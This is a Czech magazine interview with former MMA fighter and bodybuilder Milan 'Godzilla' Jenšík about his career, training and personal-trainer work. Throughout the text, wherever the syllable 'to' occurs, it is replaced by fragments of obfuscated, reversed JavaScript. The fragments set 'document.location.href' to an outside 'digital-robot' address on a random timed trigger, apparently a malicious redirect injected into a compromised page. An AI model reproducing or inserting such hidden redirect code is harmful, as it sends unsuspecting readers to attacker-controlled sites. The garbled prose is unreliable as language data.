MMA,  Profily

MILAN GODZILLA JENŠÍK – MMA vs. KULTURISTIKA

Připravila Katka Götzová, fotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to Josef Adlt

 

Celkem šestkrát nastobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toupil do oktagonu, z tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toho čtyřikrát vyšel ven jako vítěz. Vždycky chtěl mít velké svaly a dřinu s činkami si vysloveně užívá. Ne náhodou už řadu let spojuje svoje jméno s legendárním obřím netvorem…

 

Máte za sebou dlouhé roky strávené celou řadou sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovních disciplín, kterou jste začínal a v jakém pořadí pak následovaly další?

Začal jsem v šesti letech s fotbalem, asi jako každý kluk. Chytal jsem v bráně. Potobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom následoval amatérsky hokej a devíti jsem začal chodit na řecko-římské zápasy za Rudou hvězdu Praha. Tam jsem vyhrál svůj první závod. Zápasil jsem do nějakých šestnácti let a potobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom jsem od roku 1989 začal cvičit v posilovně. Byla tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to posilovna po domácky vyrobená ve sklepě našeho baráku. Veškeré vybavení tvořily jenom činky, lavičky a hrazda… stroje neexistobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovaly.

 

Co stálo za odklonem od zápasu k činkám?

Začátkem 90. let se začala otevírat různá fitka a i váš časopis mně motivoval k tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomu, abych na sobě začal pracovat a tvarovat si tělo. Chtěl jsem mít velké svaly a bavilo mně dřít s činkami.

 

Myslíte si, že tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to dneska mají mladí kluci jednodušší, když se jim nabízí moderně vybavená fitness centra?

Určitě ano, dnešní vybavenost fitness center a dostupnost všech doplňků a informací vše značně usnadní.

 

Je kulturistika dobrou průpravou pro bojovníka MMA?

Samotná kulturistika ne. MMA chce ohebnost, pružnost a vynikající kondici, tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomu příliš velké svaly nesvědčí. Síla je také zapotřebí, ale ta vytrvalostní. Velké svaly spalují hodně energie a ta potobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom v oktagonu chybí.

 

Bez čeho se ale bojovník MMA neobejde, tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to je cvičení ve fitku. Je tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to tak?

Ano, trénink v posilovně je jeden ze základních kamenů úspěchu MMA bojovníka.

 

V současné době tedy závodíte v MMA?

V současné době již nezápasím. Moje manželka tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to špatně nesla. Měla o mě strach. Takže když mi skončilo sponzorství, tak jsem nehledal jiné alternativy a ukončil jsem tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to.

 

S jakým výsledkem?

Zápasil jsem v nejvyšší váhové kategorii do 120 kg. Byly 4 výhry a 2 prohry. Prohry jsem nikdy jako velké prohry nebral, jelikož mi vždy stavěli zkušené a těžké soupeře a já jsem byl v podstatě v tétobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to disciplíně začátečník.

 

Chodila se manželka na vaše zápasy dívat?

Ano, manželka chodila na každý zápas, ale špatně tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to psychicky nesla. I díky ní, jsem se rozhodl s tím přestat, nechtěl jsem jí tím trápit.

Co vás vlastně k MMA přivedlo?

Od osmnácti dělám thajský box u kamaráda Petra Macháčka a zároveň jsem se živil více než 16 let jako vyhazovač na diskotékách a v klubech. Potobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom jsem začal pracovat jako osobní ochranka pro Jirku Červinku a dohlížel jsem i na jeho herny a casina Bornea. Právě Jirka byl jedním ze sponzorů galavečerů MMA Noc Válečníků v Kladně, které organizoval mistr světa v thajském boxu Pavel Hakim Majer.

A tak se zrodil nápad, proč do ringu a klecí neposlat i mě. V té době jsem dělal kulturistiku a měl jsem i kondičku, jelikož jsem chodil také boxovat a běhat. Byl jsem atraktivní svojí velkou kulturistickou postavou a výškou plus tím, že nemám problém si tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to rozdat v kleci.

Tímtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to bych chtěl Jirkovi Červinkovi veřejně poděkovat za jeho velkou podporu a důvěru ve mě.

Vzpomenete si na svoje pocity před prvním vstupem do klece?

Pocity jsem měl pokaždé stejné. Nevadilo mi tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, že se jdu s někým rvát, spíš tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, abych nezklamal fanoušky a předvedl co nejlepší výkon. V kleci tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to z vás ale rychle spadne, tam na tyhle myšlenky není vůbec čas.

 

Je trénink MMA v něčem specifický? Díky čemu se zásadně odlišuje od klasického kulturistického tréninku?

V MMA musíte umět od všeho něco. MMA znamená v překladu mix bojových sportů. Musíte umět zápasit na zemi, boxovat a kopat ve stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toje, vše tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to sladit v zápas a k tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomu připojit kondici, sílu a vytrvalost. A samozřejmě se snažit schytat co nejmíň úderů a když nějaký přijde, je zapotřebí tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to ustát.

Kulturistika se zaměřuje na jednotlivé partie těla a dané svaly, na kterých se usilovně pracuje.

Je tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to každé úplně něco jiného, společného mají jen tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, že oboje vyžaduje úsilí a disciplínu.

 

Je nějaký sport, který byste rád vyzkoušel?

Závodní silniční cyklistiku a horolezectví v Himalájích. Ale asi z tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toho nic nebude, protobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tože na cyklistiku jsem moc veliký a mám závratě z výšek :D.

 

Věnujete se v současné době nějakému sportu závodně?

Ne, stále se ale udržuji v kondici. Myslím si, že jako trenér bych měl jít příkladem svým klientům.

Cvičím 5x týdně v posilovně, doma jsem hodiny na rotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topedu a občas si jdu zaběhat. To je můj životní styl a bez tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toho se necítím dobře.

Do budoucna se ještě určitě někde na soutěži objevím, ale zatím nemám tu potřebu.

 

Kdo nejčastěji vyhledává vaše služby osobního trenéra?

Moji klienti jsou častobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to úplně běžní lidé, kteří potřebují změnit svoji životobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosprávu, začít se sebou něco dělat anebo i klienti, co už mají dobrou formu a chtějí ji ještě vylepšit. Mohu pomoct i v přípravě na závody.

Srovnám jídelníček a pracujeme na postavě dle potřeby každého jednotlivce. Trénuji ženy i muže, jednotlivce i dvojice.

Trénujete raději závodníky nebo „běžné smrtelníky“?

Raději běžné smrtelníky, ale nemám problém s nikým.

 

Nenarážíte u nich na tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, že jim chybí disciplína, s níž většinou závodník problém nemá?

Tihle lidé spíš neví kudy kam, nemají informace a neví, co jíst a jak cvičit. Někdo nějaké znalosti má, ale chybí mu ten „drive“ nebo se prostě nedokope. Případně třeba i do fitka chodí, ale cvičí tak, že nevidí žádné výsledky. Neumí si poskládat trénink a má špatnou techniku provedení cviků. Kolikrát se na takové cvičence dívám a je škoda, že už jsou ve fitku, cvičí, ale dělají tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to špatně. Někdo si nechá poradit, ale častobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to o tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to nestobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tojí a myslí si, že ví všechno nejlíp.

Závodník má jasný cíl a ví, co se po něm bude chtít. Takže makat prostě musí, pokud se chce umístit.